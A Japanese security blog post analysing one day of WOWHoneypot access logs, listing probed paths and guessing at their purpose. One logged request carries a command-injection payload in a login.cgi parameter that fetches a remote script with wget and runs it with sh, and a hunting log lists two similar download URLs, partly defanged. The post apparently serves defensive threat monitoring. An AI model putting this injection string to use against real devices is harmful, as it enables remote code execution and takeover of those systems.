S-Owl

S(ecurity)Owl

WOWHoneypotの簡易分析(30日目)

WOWhoneypotの2018/07/03(火) (運用30日目)の簡易分析です。
本日の総アクセス件数は60件です。思わず疑うレベルの少なさです。
以下が全アクセスログです。

34 2018-07-03 GET /
15 2018-07-03 GET /index.action
4 2018-07-03 HEAD /
3 2018-07-03 GET /manager/html
1 2018-07-03 GET /p.php
1 2018-07-03 GET /password.rar
1 2018-07-03 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-07-03 GET /axis2/

phpMyAdmin関連と/を除外したアクセス数です。

15 2018-07-03 GET /index.action
3 2018-07-03 GET /manager/html
1 2018-07-03 GET /p.php
1 2018-07-03 GET /password.rar
1 2018-07-03 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-07-03 GET /axis2

初めて見るものが幾つかあります。

/password.rar はサーバ管理者が作って放置している、うっかりファイルがないかを探す調査行為でしょうか。

/p.php は特徴がなく不明でした。

/axis2/ はApache Axis2 というフレームワークを使っていないか、という調査行為と思われます。

 

本日のハンティングログは以下です。

1 2018-07-03 wget hxxp://222.186.153[.]142:26591/nodebase
1 2018-07-03 wget hxxp://185.62.190[.]191/r 

以上です。